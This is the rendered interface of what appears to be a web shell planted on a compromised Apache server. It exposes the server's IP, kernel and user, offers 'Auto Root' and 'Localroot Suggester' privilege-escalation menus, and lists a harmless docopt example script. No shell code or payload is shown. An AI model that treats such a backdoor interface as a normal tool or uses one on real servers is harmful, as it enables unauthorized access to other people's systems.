Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
python3-docopt /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
git
[ DIR ]
drwxr-xr-x
2024-07-10 10:55
arguments_example.py
594
B
-rw-r--r--
2014-06-16 11:14
calculator_example.py
506
B
-rw-r--r--
2014-06-16 11:14
counted_example.py
405
B
-rw-r--r--
2014-06-16 11:14
naval_fate.py
597
B
-rw-r--r--
2014-06-16 11:14
odd_even_example.py
239
B
-rw-r--r--
2014-06-16 11:14
options_example.py
1.56
KB
-rw-r--r--
2014-06-16 11:14
options_shortcut_example.py
572
B
-rw-r--r--
2014-06-16 11:14
quick_example.py
313
B
-rw-r--r--
2014-06-16 11:14
validation_example.py
887
B
-rw-r--r--
2014-06-16 11:14
Save
Rename
"""Example of program with many options using docopt. Usage: options_example.py [-hvqrf NAME] [--exclude=PATTERNS] [--select=ERRORS | --ignore=ERRORS] [--show-source] [--statistics] [--count] [--benchmark] PATH... options_example.py (--doctest | --testsuite=DIR) options_example.py --version Arguments: PATH destination path Options: -h --help show this help message and exit --version show version and exit -v --verbose print status messages -q --quiet report only file names -r --repeat show all occurrences of the same error --exclude=PATTERNS exclude files or directories which match these comma separated patterns [default: .svn,CVS,.bzr,.hg,.git] -f NAME --file=NAME when parsing directories, only check filenames matching these comma separated patterns [default: *.py] --select=ERRORS select errors and warnings (e.g. E,W6) --ignore=ERRORS skip errors and warnings (e.g. E4,W) --show-source show source code for each error --statistics count errors and warnings --count print total number of errors and warnings to standard error and set exit code to 1 if total is not null --benchmark measure processing speed --testsuite=DIR run regression tests from dir --doctest run doctest on myself """ from docopt import docopt if __name__ == '__main__': arguments = docopt(__doc__, version='1.0.0rc2') print(arguments)